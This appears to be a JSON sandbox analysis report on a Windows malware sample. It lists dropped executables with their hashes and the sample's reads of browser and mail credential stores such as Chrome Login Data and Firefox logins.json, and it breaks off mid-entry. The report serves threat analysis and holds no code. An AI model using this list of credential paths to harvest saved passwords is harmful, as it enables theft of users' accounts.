{ "analysis_details": { "creation_time": "2017-10-12 12:38 (UTC+2)", "execution_successful": true, "number_of_processes": 15, "reputation_enabled": true, "termination_reason": "timeout", "type": "analysis_details", "version": 2, "vm_analysis_duration_time": "00:02:26" }, "artifacts": { "files": [ { "filename": "CONOUT$", "hashes": [], "norm_filename": "conout$", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", "hashes": [], "norm_filename": "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Temp\\42753.exe", "hashes": [ { "md5_hash": "d6c8126371d37ffe3100755db6aa22ed", "sha1_hash": "294b381e200aa3f343989877c9ef5efdda25ca42", "sha256_hash": "fbff242aeeff98285e000ef03cfa96e87d6d63c41080d531edcb455646b64eec", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\temp\\42753.exe", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", "hashes": [], "norm_filename": "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\pOwerSheLL.config", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\", "hashes": [], "norm_filename": "c:", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\desktop", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users", "hashes": [], "norm_filename": "c:\\users", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\Documents\\WindowsPowerShell\\profile.ps1", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\documents\\windowspowershell\\profile.ps1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\documents\\windowspowershell\\microsoft.powershell_profile.ps1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "STD_INPUT_HANDLE", "hashes": [], "norm_filename": "std_input_handle", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\email.doc", "hashes": [], "norm_filename": "c:\\email.doc", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\a\\foobar.bmp", "hashes": [], "norm_filename": "c:\\a\\foobar.bmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\42753.exe", "hashes": [], "norm_filename": "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\42753.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe:Zone.Identifier", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe:zone.identifier", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe", "hashes": [ { "md5_hash": "d6c8126371d37ffe3100755db6aa22ed", "sha1_hash": "294b381e200aa3f343989877c9ef5efdda25ca42", "sha256_hash": "fbff242aeeff98285e000ef03cfa96e87d6d63c41080d531edcb455646b64eec", "type": "file_hash", "version": 1 }, { "md5_hash": "2b8584cab96d20ee851054f9fedef7f3", "sha1_hash": "de72320cc8fc12f2e410afa07809b620f81066dc", "sha256_hash": "f99020bb1a5659d35ad57d0dd13d053c7ab20c0b0b70201b71b4e3aafede7cd1", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\42753.exe", "hashes": [], "norm_filename": "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\42753.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe", "hashes": [ { "md5_hash": "d6c8126371d37ffe3100755db6aa22ed", "sha1_hash": "294b381e200aa3f343989877c9ef5efdda25ca42", "sha256_hash": "fbff242aeeff98285e000ef03cfa96e87d6d63c41080d531edcb455646b64eec", "type": "file_hash", "version": 1 }, { "md5_hash": "2b8584cab96d20ee851054f9fedef7f3", "sha1_hash": "de72320cc8fc12f2e410afa07809b620f81066dc", "sha256_hash": "f99020bb1a5659d35ad57d0dd13d053c7ab20c0b0b70201b71b4e3aafede7cd1", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\ekgEobhbhTp7rXMh.exe", "hashes": [ { "md5_hash": "2b8584cab96d20ee851054f9fedef7f3", "sha1_hash": "de72320cc8fc12f2e410afa07809b620f81066dc", "sha256_hash": "f99020bb1a5659d35ad57d0dd13d053c7ab20c0b0b70201b71b4e3aafede7cd1", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\ekgeobhbhtp7rxmh.exe", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\ekgEobhbhTp7rXMh.exe", "hashes": [ { "md5_hash": "2b8584cab96d20ee851054f9fedef7f3", "sha1_hash": "de72320cc8fc12f2e410afa07809b620f81066dc", "sha256_hash": "f99020bb1a5659d35ad57d0dd13d053c7ab20c0b0b70201b71b4e3aafede7cd1", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\ekgeobhbhtp7rxmh.exe", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\C570.tmp", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\programdata\\c570.tmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\C571.tmp", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 }, { "md5_hash": "36427ecb2a0faf13af3047c51b29f9c5", "sha1_hash": "9a3fb26927a7aa81255cf8abcc1f1c3e38f28c4f", "sha256_hash": "ea156f649bb1180b32c6d5be76c0969941ec76d1fface734f401b5327ac57345", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\programdata\\c571.tmp", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\C572.tmp", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 }, { "md5_hash": "f10107805ff54bb9c1e1cb047b604439", "sha1_hash": "787f5296c509df55e9dea0f22ea76afaa8953676", "sha256_hash": "f4a00adb6eeaf4985068b04cb755ecb8874f7e4fbdd7c8630b0ba96c99b63a68", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\programdata\\c572.tmp", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost_lng.ini", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost_lng.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Profiles", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\mozilla\\profiles", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Thunderbird\\Profiles", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\thunderbird\\profiles", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Mozilla Thunderbird", "hashes": [], "norm_filename": "c:\\program files\\mozilla thunderbird", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "STD_OUTPUT_HANDLE", "hashes": [], "norm_filename": "std_output_handle", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "STD_ERROR_HANDLE", "hashes": [], "norm_filename": "std_error_handle", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat", "hashes": [ { "md5_hash": "4d32b3456316311c50d77f7a37556236", "sha1_hash": "47f9117eb7cf12bd3c36295b8084e98d962b6861", "sha256_hash": "4ff606ec32478199d9183c9ec73ed4d0787f52ecc6504b7ce2d5cdf3ded0a5a6", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017101220171013\\index.dat", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\mshist012017101220171013\\index.dat", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\index.dat", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\history\\low\\history.ie5\\index.dat", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017063020170701\\index.dat", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\history\\low\\history.ie5\\mshist012017063020170701\\index.dat", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default\\places.sqlite", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\mozilla\\firefox\\profiles\\zp0p8bce.default\\places.sqlite", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\default\\web data", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\default\\login data", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV24.dat", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\webcache\\webcachev24.dat", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default\\history.dat", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\mozilla\\firefox\\profiles\\zp0p8bce.default\\history.dat", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\mozilla\\firefox\\profiles.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Mozilla Firefox\\nss3.dll", "hashes": [], "norm_filename": "c:\\program files\\mozilla firefox\\nss3.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default\\logins.json", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\mozilla\\firefox\\profiles\\zp0p8bce.default\\logins.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default\\signons.sqlite", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\mozilla\\firefox\\profiles\\zp0p8bce.default\\signons.sqlite", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Mozilla Firefox\\sqlite3.dll", "hashes": [], "norm_filename": "c:\\program files\\mozilla firefox\\sqlite3.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Mozilla Firefox\\mozsqlite3.dll", "hashes": [], "norm_filename": "c:\\program files\\mozilla firefox\\mozsqlite3.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\SeaMonkey\\profiles.ini", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\mozilla\\seamonkey\\profiles.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Sea Monkey\\nss3.dll", "hashes": [], "norm_filename": "c:\\program files\\sea monkey\\nss3.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Login Data", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\yandex\\yandexbrowser\\user data\\default\\login data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\Web Data", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\certificatetransparency\\web data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\Login Data", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\certificatetransparency\\login data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\Web Data", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\crashpad\\web data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\Login Data", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\crashpad\\login data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-journal", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\default\\web data-journal", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-wal", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\default\\web data-wal", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-journal", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\default\\login data-journal", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-wal", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\default\\login data-wal", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\Web Data", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\evwhitelist\\web data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\Login Data", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\evwhitelist\\login data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\Web Data", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\filetypepolicies\\web data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\Login Data", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\filetypepolicies\\login data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials\\Web Data", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\origintrials\\web data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials\\Login Data", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\origintrials\\login data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash\\Web Data", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\pepperflash\\web data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash\\Login Data", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\pepperflash\\login data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl\\Web Data", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\pnacl\\web data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl\\Login Data", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\pnacl\\login data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\Web Data", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\sslerrorassistant\\web data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\Login Data", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\sslerrorassistant\\login data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwiftShader\\Web Data", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\swiftshader\\web data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwiftShader\\Login Data", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\swiftshader\\login data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\Web Data", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\swreporter\\web data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\Login Data", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\swreporter\\login data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\Web Data", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\widevinecdm\\web data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\Login Data", "hashes": [], "norm_filename": 